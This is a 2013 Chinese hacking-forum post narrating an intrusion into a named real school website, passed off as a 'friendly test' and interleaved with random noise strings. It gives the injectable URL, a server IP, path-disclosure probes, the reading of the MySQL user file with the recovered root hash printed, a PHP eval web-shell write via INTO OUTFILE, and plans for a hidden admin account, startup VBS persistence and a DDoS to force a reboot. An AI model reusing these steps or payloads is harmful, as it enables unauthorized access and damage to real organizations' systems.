找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2895|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
1 i2 x: z  Z$ ^1 x) ]9 t发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
' U' b, s" Y+ H& x- o% Y6 i/ N7 }+ z- V' n/ y) h# r5 o/ L. y* C

2 b: p, v5 ]" _# K! j: T5 J% j: [  t# z, U& i
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
8 n' j  I" C" F
) ?8 V7 a! h0 g; `" U6 Q5 X# o那么想可以直接写入shell ,getshell有几个条件:! v  }4 t0 W+ z9 C
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
7 P5 u4 B, B, o9 w! V' C4 J
  J( V% ]( z; _) F1 l$ Q试着爆绝对路径:
, ?0 O5 C) G1 L7 R7 s" x1./phpMyAdmin/index.php?lang[]=1  / B! n2 W; r5 E: M
2./phpMyAdmin/phpinfo.php  
4 |7 d, Q$ E7 ?/ j0 v( y3./load_file()  
- V# d1 }0 ^, @1 o4./phpmyadmin/themes/darkblue_orange/layout.inc.php  3 D) w  h) o/ W
5./phpmyadmin/libraries/select_lang.lib.php  7 D& y* E8 Z! S1 H1 G
6./phpmyadmin/libraries/lect_lang.lib.php  0 A; g* x  C: F( p6 v9 b
7./phpmyadmin/libraries/mcrypt.lib.php   ' M' Z& s+ ~* i+ f: ^* Y0 {) G
8./phpmyadmin/libraries/export/xls.php  
/ W+ Q4 r8 ^9 D6 m+ u8 D1 r
, f  U. }5 X& ~0 r8 l均不行...........................0 M# w  r# s1 \" G

. V: J# [+ N9 g9 h7 v4 A御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php( V7 e' [% l4 B; j

$ ~& s- W* G% D4 {2 L1 n权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
7 j  L! I& z+ B1 l
7 Z9 v( s2 D& J; [1 @默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
' `# T2 i" G" t6 j
5 B  d, ^5 P. ~; e3 v5 ~敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........& Q" y0 @& \9 A; s
6 r- @. h; H+ t$ k* y
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 7 ?# G9 y1 {9 W( g# R: t
, u; Z' ]8 X0 a& a# G0 I
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 6 l5 G, Z, g& J; _+ h

$ ]  v9 y  J$ X0 q; M5 ]自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
7 q: d2 r1 [& M0 C4 x) Z+ A* h& M, R- x% ]
成功读到root密码:- h) G+ }: B5 p3 @

2 h) @6 o) u) R" J3 Z17---- r(0072)* ~$ t# S- [, ~" f& w
18---- o(006f)
3 G& L1 x2 a9 g! `% l' x2 v0 O0 D19---- o(006f)
5 O) Z! s* \  B- O; D0 v20---- t(0074)$ U( o9 _* q, _
21---- *(002a)* ]# U) B  Z* n' f. X
22---- 8(0038)
* M8 n1 r3 p! p: @0 R" t, K3 w23---- 2(0032)
8 f) U+ J, t& W. z, g# u% e" q24---- E(0045)8 `% ^  \8 N9 S& v2 T' t9 e) O
25---- 1(0031)! b) O1 h  O2 N9 Q0 s
26---- C(0043)
' E  J! m4 O3 D5 R0 o# y/ q27---- 5(0035)/ _  M/ D9 h4 R3 n: q7 k
28---- 8(0038)% X, j+ g! [. S9 o) Q* r
29---- 2(0032): E7 [4 |5 {+ h1 s1 I8 M3 O
30---- 8(0038), i- i, E' s  R  x
31---- A(0041)
/ [6 C# l4 W3 H0 s, S: P32---- 9(0039)
: D* H  ^9 V* |7 k33---- B(0042)
; G1 Q* s+ ~* v7 D34---- 5(0035)' z2 g, f7 F( M6 V: ]) ]0 P
35---- 4(0034)
3 T1 ]+ }# S; c2 N+ S4 B' V6 j6 B36---- 8(0038)" U! _% p2 C# c7 i9 m
37---- 6(0036)
2 J5 G( i* F7 b8 A4 V38---- 4(0034)6 ]  I' r# F1 Z+ X" F1 B4 u
39---- 9(0039)* g( `6 S% S5 r7 `
40---- 1(0031)
! ^) ^+ r( \# [; z8 U6 R# L0 e/ m8 v  h41---- 1(0031)
4 Z# j2 Q$ Z' U/ h42---- 5(0035)$ {$ D1 ~& R" ^3 u1 ]
43---- 3(0033)% v$ ?5 d! M( D! c# G; ]. n9 S2 A
44---- 5(0035)/ C% I6 U  j' i
45---- 9(0039)- q1 i2 ^. [6 _$ ?0 @+ p
46---- 8(0038)5 q/ V; D' v3 }% l
47---- F(0046)3 ~/ ^/ `2 F, s
48---- F(0046): ]1 p1 Q. h5 n7 Y) M  b
49---- 4(0034)+ H+ M: j% ]! h0 ]
50---- F(0046)
* C7 u; k) m3 H% p51---- 0(0030)
8 `7 Y. d9 T- T5 T52---- 3(0033); `. ]* x5 F6 X, Z6 r" Y  o
53---- 2(0032), d' E: l; U  q/ V
54---- A(0041)# Y4 R1 M$ ]3 ?! v, B% m! Z
55---- 4(0034); D$ T: R/ M# x9 [; J+ Z
56---- A(0041)
/ L4 D( k7 g$ P# [& m5 c57---- B(0042)/ v7 F$ ?: L8 M" p' A. Q
58---- *(0044)5 w% K/ g, d" c, l- S- Z! f+ J" n
59---- *(0035); u+ L0 p3 h) [! X! W$ [) p
60---- *(0041)
, @$ ?: [. T: D1 f% p+ a) p4 o61---- *0032)
8 l2 j% u( A+ e. j
# Q3 t8 R- p0 f. a解密后成功登陆phpmyamin0 v) G+ Z& F# d4 A( _9 G& B
                          
( C& C( z1 S0 c! C3 N9 B; q4 C( c: W2 T
                             $ p& i% K2 C# k/ z! P- \- W1 R
7 f% r8 K0 z/ q: d
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
, X/ d* @% ]$ \9 t4 P" S/ e$ F
) M) o2 }$ P$ Q. `成功执行,拿下shell,菜刀连接:# x- N/ |7 G, Q9 q. U) o* n

" a& M5 f# x" w) U服务器不支持asp,aspx,php提权无果...................
  e* j9 _: I0 d3 X) ]6 y
4 ^. Q6 i5 x1 m3 G% l8 c但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
; z1 D! p+ @' ?  b  J6 A" x
服务器上已经有个隐藏帐号了
% m1 w! W6 w$ [9 C3 i
别名     administrators0 O7 |# A4 W* r
注释     管理员对计算机/域有不受限制的完全访问权

& L: \+ s0 m/ a4 g0 n5 ^( H
成员
% {7 z+ K: k) ^, V  J" u
-------------------------------------------------------------------------------
# l. ~2 k1 I# H( a  o4 E% ladmin
8 T$ G  R6 Q% p& LAdministrator
( P, q- M5 f9 G3 Hslipper$
; w& Z' Q2 |, D, U0 w7 [7 n4 M* Lsqluser
9 Q( e2 T9 G! a. w+ o. r, U7 A命令成功完成。
* {% w) \% d: R; C/ x+ O% E0 P
& R1 P" ?: W) n% n. x( B: f4 l服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。' |, w2 \4 o; F1 n0 N' C, g
. K7 c9 z2 y# f4 H+ A( P' N
ddos服务器重启,不然就只能坐等服务器重启了...............................
0 X. `/ _7 C! |
2 B$ J+ T% e# D0 [4 ]' G! C      
6 v4 q8 e* g+ z% k2 x

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表